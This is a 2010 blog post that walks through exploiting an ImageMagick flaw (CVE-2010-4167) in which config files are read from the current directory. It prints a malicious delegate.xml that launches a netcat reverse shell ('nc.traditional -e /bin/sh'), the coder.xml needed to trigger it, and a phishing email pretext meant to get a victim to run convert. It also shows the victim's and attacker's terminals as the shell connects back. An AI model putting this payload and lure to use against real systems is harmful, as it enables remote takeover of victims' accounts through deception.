Thursday, December 30, 2010

Funny ImageMagic CMD Injection

Sometimes i don't read vendors vulnerability reports, because they are so boring and don't give technical information about vulnerability. Last day, i read Ubuntu Security Notice's vulnerability report and it seemed interesting. Firstly, i read description section, it says;
"It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges." [1]

After that i search for CVE ID of vulnerability "CVE-2010-4167". If i don't find anything i will be review diff files. But debian bug tracking pages help me. [2]
I always belive that, bug tracking systems always very usefull for finding security bugs/developing exploits.

The opened issue was true, when you create config files and run imagemagic, imagemagic looks current directory for config files, so if you can able to create malicious config file or your target run "convert" binary with your malicious config file, you can execute commands with current user privileges.

We create malicious xml config files, they are execute commands on currents users context. In example, i execute netcat for getting a reverse shell -) I send mail them to my victim;
"Hello dear, i need to convert my png file to jpg and i can't access my computer now, can you do it for me? I attached the png file.."

If my victim open it (for this case he will open :P ) my arbitrary codes will be executed on system.

[victim@vmware:~/img]$ unzip
... snipped ...
[victim@vmware:~/img]$ convert x.png a.jpg
convert: unable to open image `/tmp/magick-XXFJtZIk': No such file or directory @ blob.c/OpenBlob/2480.
convert: unable to open file `/tmp/magick-XXFJtZIk': No such file or directory @ constitute.c/ReadImage/569.
convert: missing an image filename `a.jpg' @ convert.c/ConvertImageCommand/2838.

[cb@lab:~/imagemagic-Xploi7]$ nc.traditional -lvvp 1337
listening on [any] 1337 ...
connect to [] from localhost [] 37267
echo "owned :P"
owned :P
 sent 24, rcvd 57

Here is the example delegate.xml file:
<delegate decode='png' command="nc.traditional -e /bin/sh 1337"/>

and here is the example coder.xml file:
<coder magick='png' name='notpng'/>

Note: delegate.xml file needs coder.xml for executing by imagemagic.

[1] -
[2] -

No comments:

Post a Comment